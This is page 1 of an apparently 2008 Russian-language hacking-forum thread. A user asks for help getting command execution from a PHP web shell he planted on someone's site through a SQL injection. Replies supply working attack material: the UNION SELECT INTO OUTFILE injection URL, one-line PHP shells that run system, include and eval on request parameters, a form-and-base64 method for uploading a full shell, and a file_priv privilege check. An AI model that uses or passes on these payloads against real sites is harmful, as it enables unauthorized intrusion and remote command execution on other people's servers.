HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Заливка php шелла
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Заливка php шелла
  #1  
Старый 08.01.2008, 19:49
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
С нами:
9903046

Репутация: 13
По умолчанию Заливка php шелла
В общем имеется дырявый сайт с инъекцией http://site.com/bug.php?&id=-1' union select 1,2/*
Пытаюсь залить на него php-shell: http://site.com/bug.php?&id=-1' union select <? system($_GET[cmd]);?>,2 into outfile '/www/site/shell.php'/*
Шелл shell.php успешно создается но при попытке исполнить команду http://site.com/shell.php?cmd= ничего не выводится. Пытался использовать и exec() и passthru() - результат тот же. Функции system(),exec() и passthru() не задизейблены.
Подскажите что не так?
ЗЫ сервер крутится на винде
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 08.01.2008, 20:05
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266

Репутация: 3486


По умолчанию
<? include($_GET[blablabla]);?>
__________________
..
 

  #3  
Старый 08.01.2008, 20:18
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
С нами:
9903046

Репутация: 13
По умолчанию
И что? Как я понял это даст произвольные файлы инклудить а мне бы команды выполнять
 

  #4  
Старый 08.01.2008, 20:58
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266

Репутация: 3486


По умолчанию
Омфг. Инклудишь шелл, дальше работай шеллом. Удобнее как ни крути.
__________________
..
 

  #5  
Старый 08.01.2008, 21:00
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973

Репутация: 123
По умолчанию
моё решение, заливаешь шелл вида
<?php eval($_POST['shell'])?>
создаёшь html файл с кодом
Код:
<html>
<body>
<form action=[адрес шелла]>
<textarea name='shell'>
</textarea>
</body>
</html>
Затем берёшь и перегоняешь весь код шелла в base64 и пишешь нечто такое -
Код:
$fh=fopen('newshell.php','w');
fputs($fh,base64_decode('шелл в бэйс64'));
fclose($fh);
Вставляешь в textarea и отправляешь
Вот примерно так
Последний раз редактировалось Termin@L; 08.01.2008 в 21:22..
 

  #6  
Старый 08.01.2008, 21:10
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386

Репутация: 849
По умолчанию
http://site.com/bug.php?&id=-1' union select file_priv,2 from mysql.user/*
Если Y будет, то можно будет INTO OUTFILE, если N, то соответсвенно низя (ну и если выругается, что доступа нет - тоже)
 

  #7  
Старый 08.01.2008, 21:12
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346

Репутация: 4303


По умолчанию
Basurman, и зачем ему это? пздц, ты вообще первый пост читал?
ty13r, делай то что тебе Слип говорит
ЗЫ Ты кстати какие команды пытался выполнить?
 

  #8  
Старый 08.01.2008, 21:14
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386

Репутация: 849
По умолчанию
вот к этому
Цитата:
Шелл shell.php успешно создается
P.S. пздц, а то непохек
 

  #9  
Старый 08.01.2008, 21:17
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346

Репутация: 4303


По умолчанию
ты што, наркоман? у него файл создаётся соответственно у юзера file_priv = 1, нахуя ему их узнавать то теперь раз он уже смог файл залить? ты сам понял чё написал?
 

  #10  
Старый 08.01.2008, 21:26
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386

Репутация: 849
По умолчанию
Цитата:
Сообщение от Spyder  
file_priv = 1
Брат-наркоман?
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла в Joomla AkyHa_MaTaTa Веб-уязвимости 75 02.09.2013 06:53
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.